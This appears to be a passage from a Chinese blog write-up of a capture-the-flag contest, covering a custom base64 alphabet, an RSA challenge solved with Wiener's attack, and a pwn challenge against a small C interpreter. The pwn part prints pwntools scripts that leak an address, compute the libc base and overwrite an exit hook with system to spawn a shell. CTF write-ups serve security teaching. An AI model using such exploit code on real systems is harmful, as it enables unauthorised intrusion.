<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sZGad02wvbf3mtxEq8rDhYK47LueClz1Jig6ypHM+o/W5QjNPFRckUInOTXVAS9B</span><br></pre></td></tr></table></figure>

<p>BASE64：</p>
<p><img src="http://cr_7.gitee.io/git-hub-image/image-20211102092744570.png" alt="image-20211102092744570"></p>
<h2 id="CRYPTO"><a href="#CRYPTO" class="headerlink" title="CRYPTO"></a>CRYPTO</h2><h3 id="RSA-and-BASE"><a href="#RSA-and-BASE" class="headerlink" title="RSA and BASE?"></a>RSA and BASE?</h3><p>维纳攻击获取私钥，直接求明文然后转为字符串</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">import RSAwienerHacker</span><br><span class="line">from Crypto.Util.number import *</span><br><span class="line">n=5666124351942656329992005813409286237073739794994721039484302</span><br><span class="line">185647742095961513255361083010496164557461500595618370319100642</span><br><span class="line">150846100969878038236094356200148515345540165069753295159119173</span><br><span class="line">716454752095162833694128987319897964117354123211751879170682669</span><br><span class="line">9650307105202062429672725308809988269372149027026719779368169</span><br><span class="line">e=3626978804470326742617734099282617214017440439057773628147889</span><br><span class="line">138161229420766689152901993773272024660206235824475117794228915</span><br><span class="line">566219741059443429300413095267135497370099980385015369754560631</span><br><span class="line">285927255483523208953336674386736118178647212612416978709483797</span><br><span class="line">7468259794816050397735724313560434944684790818009385459207329</span><br><span class="line">c=1379543011013691527422298742405071919010615634495862478193503</span><br><span class="line">943875277897635792492507106799116262708950904555022834556651783</span><br><span class="line">899177770538637302860658094590778586748855300156247988822241730</span><br><span class="line">661514022228620230459400356523216217613903170384408213541178279</span><br><span class="line">90307003831352154618952447402389360183594248381165728338233</span><br><span class="line">d = RSAwienerHacker.hack_RSA(e, n)</span><br><span class="line">print(long_to_bytes(pow(c, d, n)))</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Hacked!</span><br><span class="line">b&#x27;flag&#123;TCMDIEOH2MJFBLKHT2J7BLYZ2WUE5NYR2HNG====&#125;&#x27;</span><br></pre></td></tr></table></figure>

<p>通过对比可以知道<code> GHI45FQRSCX****UVWJK67DELMNOPAB3</code>少了<code> ZY2T</code></p>
<p>也就是说总共有4的阶乘中可能，也就是24种。自定义映射字符，尝试多次即可发现flag</p>
<p><img src="http://cr_7.gitee.io/git-hub-image/image-20211102093010913.png" alt="image-20211102093010913"></p>
<h2 id="PWN"><a href="#PWN" class="headerlink" title="PWN"></a>PWN</h2><p>打开程序的话，代码非常长，直接先看字符串定位关键信息</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br></pre></td><td class="code"><pre><span class="line">.rodata:0000000000004ED0 ; const char aCouldNotMalloc_3[]</span><br><span class="line">.rodata:0000000000004ED0 aCouldNotMalloc_3 db &#x27;could not</span><br><span class="line">malloc(%d) source area&#x27;,0Ah,0</span><br><span class="line">.rodata:0000000000004ED0</span><br><span class="line">; DATA XREF: main+2D2↑o</span><br><span class="line">.rodata:0000000000004EF2 ; const char aInput[]</span><br><span class="line">.rodata:0000000000004EF2 aInput db &#x27;Input:&#x27;,0</span><br><span class="line">; DATA XREF: main:loc_39FC↑o</span><br><span class="line">.rodata:0000000000004EF9 ; const char aDBadEnumIdenti[]</span><br><span class="line">.rodata:0000000000004EF9 aDBadEnumIdenti db &#x27;%d: bad enum</span><br><span class="line">identifier %d&#x27;,0Ah,0</span><br><span class="line">.rodata:0000000000004EF9</span><br><span class="line">; DATA XREF: main+41C↑o</span><br><span class="line">.rodata:0000000000004F15 ; const char aDBadEnumInitia[]</span><br><span class="line">.rodata:0000000000004F15 aDBadEnumInitia db &#x27;%d: bad enum</span><br><span class="line">initializer&#x27;,0Ah,0</span><br><span class="line">.rodata:0000000000004F15</span><br><span class="line">; DATA XREF: main+475↑o</span><br><span class="line">??</span><br><span class="line">????????????????????????????input??????????</span><br><span class="line">????????????</span><br><span class="line">.rodata:0000000000004F2F ; const char aDBadGlobalDecl[]</span><br><span class="line">.rodata:0000000000004F2F aDBadGlobalDecl db &#x27;%d: bad global</span><br><span class="line">declaration&#x27;,0Ah,0</span><br><span class="line">.rodata:0000000000004F2F</span><br><span class="line">; DATA XREF: main+55D↑o</span><br><span class="line">.rodata:0000000000004F4B align 10h</span><br><span class="line">.rodata:0000000000004F50 ; const char aDDuplicateGlob[]</span><br><span class="line">.rodata:0000000000004F50 aDDuplicateGlob db &#x27;%d: duplicate</span><br><span class="line">global definition&#x27;,0Ah,0</span><br><span class="line">.rodata:0000000000004F50</span><br><span class="line">; DATA XREF: main+597↑o</span><br><span class="line">.rodata:0000000000004F71 align 8</span><br><span class="line">.rodata:0000000000004F78 ; const char aDBadParameterD[]</span><br><span class="line">.rodata:0000000000004F78 aDBadParameterD db &#x27;%d: bad parameter</span><br><span class="line">declaration&#x27;,0Ah,0</span><br><span class="line">.rodata:0000000000004F78</span><br><span class="line">; DATA XREF: main+6A0↑o</span><br><span class="line">.rodata:0000000000004F97 align 8</span><br><span class="line">.rodata:0000000000004F98 ; const char aDDuplicatePara[]</span><br><span class="line">.rodata:0000000000004F98 aDDuplicatePara db &#x27;%d: duplicate</span><br><span class="line">parameter definition&#x27;,0Ah,0</span><br><span class="line">.rodata:0000000000004F98</span><br><span class="line">; DATA XREF: main+6DD↑o</span><br><span class="line">.rodata:0000000000004FBC ; const char aDBadFunctionDe[]</span><br><span class="line">.rodata:0000000000004FBC aDBadFunctionDe db &#x27;%d: bad function</span><br><span class="line">definition&#x27;,0Ah,0</span><br><span class="line">.rodata:0000000000004FBC</span><br><span class="line">; DATA XREF: main+7D6↑o</span><br><span class="line">.rodata:0000000000004FD9 ; const char aDBadLocalDecla[]</span><br><span class="line">.rodata:0000000000004FD9 aDBadLocalDecla db &#x27;%d: bad local</span><br><span class="line">declaration&#x27;,0Ah,0</span><br><span class="line">.rodata:0000000000004FD9</span><br><span class="line">; DATA XREF: main+879↑o</span><br></pre></td></tr></table></figure>

<p>其中</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">bad function definition</span><br></pre></td></tr></table></figure>

<p>这一句话明显说明了他会检测函数调用，但是程序整体看下来只有input那有个输入点，尝试输入后返回的是一些奇怪报错</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Input:</span><br><span class="line">13213</span><br><span class="line">1: bad global declaration</span><br></pre></td></tr></table></figure>

<p>错误的全定义语句。</p>
<p>但是对input的输入方式进行仔细分析</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">*((_BYTE *)buf + read(0, buf, 0x3FFFFuLL)) = 0;</span><br></pre></td></tr></table></figure>

<p>最多读入0x3ffff大小的数据到buf，最外层套上了指针，这就是吧输入数据当函数执行了</p>
<p>由此可以写一个test验证一下，虽然开了PIE但是要是可以真正的把输入数据当函数执行，那么地址也可以泄露出来的。</p>
<p>test</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line">io = process(ELF(&quot;./c4&quot;).path)</span><br><span class="line">payload= &#x27;&#x27;&#x27;</span><br><span class="line">int main()&#123;</span><br><span class="line">int flag;</span><br><span class="line">printf(&quot;%p\n&quot;,&amp;flag);</span><br><span class="line">&#125;</span><br><span class="line">&#x27;&#x27;&#x27;</span><br><span class="line">gdb.attach(sh)</span><br><span class="line">io.sendline(payload)</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>

<p>的确可以得到地址</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Input:</span><br><span class="line">0x7f5519554fd8</span><br><span class="line">exit(15) cycle = 10</span><br></pre></td></tr></table></figure>

<p>而且经过测试，这个变量的确是低3位不改变的，用了计算libc_base是可以的。</p>
<p>直接打exit_hook</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line">io=process(&#x27;./c4&#x27;)</span><br><span class="line">payload= &#x27;&#x27;&#x27;</span><br><span class="line">int main()&#123;</span><br><span class="line">int base,system,exit;</span><br><span class="line">base = *(&amp;system-2)-0x553fd8;</span><br><span class="line">system = base + 0x04F550;</span><br><span class="line">exit = base + 0xe4ba0;</span><br><span class="line">* (int *)exit = system;</span><br><span class="line">exit(&quot;/bin/sh&quot;);</span><br><span class="line">&#125;</span><br><span class="line">&#x27;&#x27;&#x27;</span><br><span class="line">io.send(payload)</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>


      
    </div>
    <div class="article-footer">
      <blockquote class="mt-2x">
  <ul class="post-copyright list-unstyled">
    
    <li class="post-copyright-link hidden-xs">
      <strong>本文链接：</strong>
      <a href="http://example.com/2021/11/15/%E7%AC%AC%E5%9B%9B%E5%B1%8A%E5%B9%BF%E4%B8%9C%E7%9C%81%E5%BC%BA%E7%BD%91%E6%9D%AF/" title="第四届广东省强网杯" target="_blank" rel="external">http://example.com/2021/11/15/%E7%AC%AC%E5%9B%9B%E5%B1%8A%E5%B9%BF%E4%B8%9C%E7%9C%81%E5%BC%BA%E7%BD%91%E6%9D%AF/</a>
    </li>
    
    <li class="post-copyright-license">
      <strong>版权声明： </strong> 本博客所有文章除特别声明外，均采用 <a href="http://creativecommons.org/licenses/by/4.0/deed.zh" target="_blank" rel="external">CC BY 4.0 CN协议</a> 许可协议。转载请注明出处！
    </li>
  </ul>
</blockquote>


<div class="panel panel-default panel-badger">
  <div class="panel-body">
    <figure class="media">
      <div class="media-left">
        <a href="https://github.com/cofess" target="_blank" class="img-burn thumb-sm visible-lg">
          <img src="/images/avatar.jpg" class="img-rounded w-full" alt="">
        </a>
      </div>
      <div class="media-body">
        <h3 class="media-heading"><a href="https://github.com/cofess" target="_blank"><span class="text-dark">chickenmushroom</span><small class="ml-1x">Web</small></a></h3>
        <div>平平无奇的小红帽。</div>
      </div>
    </figure>
  </div>
</div>


    </div>
  </article>
  
    
  <section id="comments">
  	
      <div id="vcomments"></div>
    
  </section>


  
</div>

  <nav class="bar bar-footer clearfix" data-stick-bottom>
  <div class="bar-inner">
  
  <ul class="pager pull-left">
    
    <li class="prev">
      <a href="/2021/11/15/%E9%80%BB%E8%BE%91%E6%BC%8F%E6%B4%9E%E4%B9%8B%E6%94%AF%E4%BB%98%E9%80%BB%E8%BE%91%E6%BC%8F%E6%B4%9E/" title="逻辑漏洞之支付逻辑漏洞"><i class="icon icon-angle-left" aria-hidden="true"></i><span>&nbsp;&nbsp;Newer</span></a>
    </li>
    
    
    <li class="next">
      <a href="/2021/10/24/%E7%AC%AC%E5%9B%9B%E5%B1%8A%E6%B5%B7%E5%95%B8%E6%9D%AF/" title="(no title)"><span>Older&nbsp;&nbsp;</span><i class="icon icon-angle-right" aria-hidden="true"></i></a>
    </li>
    
    
    <li class="toggle-toc">
      <a class="toggle-btn collapsed" data-toggle="collapse" href="#collapseToc" aria-expanded="false" title="Catalogue" role="button">
        <span>[&nbsp;</span><span>Catalogue</span>
        <i class="text-collapsed icon icon-anchor"></i>
        <i class="text-in icon icon-close"></i>
        <span>]</span>
      </a>
    </li>
    
  </ul>
  
  
  
  <div class="bar-right">
    
    <div class="share-component" data-sites="weibo,qq,wechat,facebook,twitter" data-mobile-sites="weibo,qq,qzone"></div>
    
  </div>
  </div>
</nav>
  


</main>

  <footer class="footer" itemscope itemtype="http://schema.org/WPFooter">
	
	
    <ul class="social-links">
    	
        <li><a href="/null" target="_blank" title="Github" ><i class="icon icon-github"></i></a></li>
        
        <li><a href="/null" target="_blank" title="Weibo" ><i class="icon icon-weibo"></i></a></li>
        
        <li><a href="/null" target="_blank" title="Twitter" ><i class="icon icon-twitter"></i></a></li>
        
        <li><a href="/null" target="_blank" title="Behance" ><i class="icon icon-behance"></i></a></li>
        
        <li><a href="/atom.xml" target="_blank" title="Rss" ><i class="icon icon-rss"></i></a></li>
        
    </ul>

    <div class="copyright">
    	
        <div class="publishby">
        	Theme by <a href="https://github.com/cofess" target="_blank"> cofess </a>base on <a href="https://github.com/cofess/hexo-theme-pure" target="_blank">pure</a>.
        </div>
    </div>
</footer>
  <script src="//cdn.jsdelivr.net/npm/jquery@1.12.4/dist/jquery.min.js"></script>
<script>
window.jQuery || document.write('<script src="js/jquery.min.js"><\/script>')
</script>

<script src="/js/plugin.min.js"></script>


<script src="/js/application.js"></script>


    <script>
(function (window) {
    var INSIGHT_CONFIG = {
        TRANSLATION: {
            POSTS: 'Posts',
            PAGES: 'Pages',
            CATEGORIES: 'Categories',
            TAGS: 'Tags',
            UNTITLED: '(Untitled)',
        },
        ROOT_URL: '/',
        CONTENT_URL: '/content.json',
    };
    window.INSIGHT_CONFIG = INSIGHT_CONFIG;
})(window);
</script>

<script src="/js/insight.js"></script>






   




   
    
  <script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/valine"></script>
  <script type="text/javascript">
  var GUEST = ['nick', 'mail', 'link'];
  var meta = 'nick,mail,link';
  meta = meta.split(',').filter(function(item) {
    return GUEST.indexOf(item) > -1;
  });
  new Valine({
    el: '#vcomments',
    verify: false,
    notify: false,
    appId: '',
    appKey: '',
    placeholder: 'Just go go',
    avatar: 'mm',
    meta: meta,
    pageSize: '10' || 10,
    visitor: false
  });
  </script>

     







</body>
</html>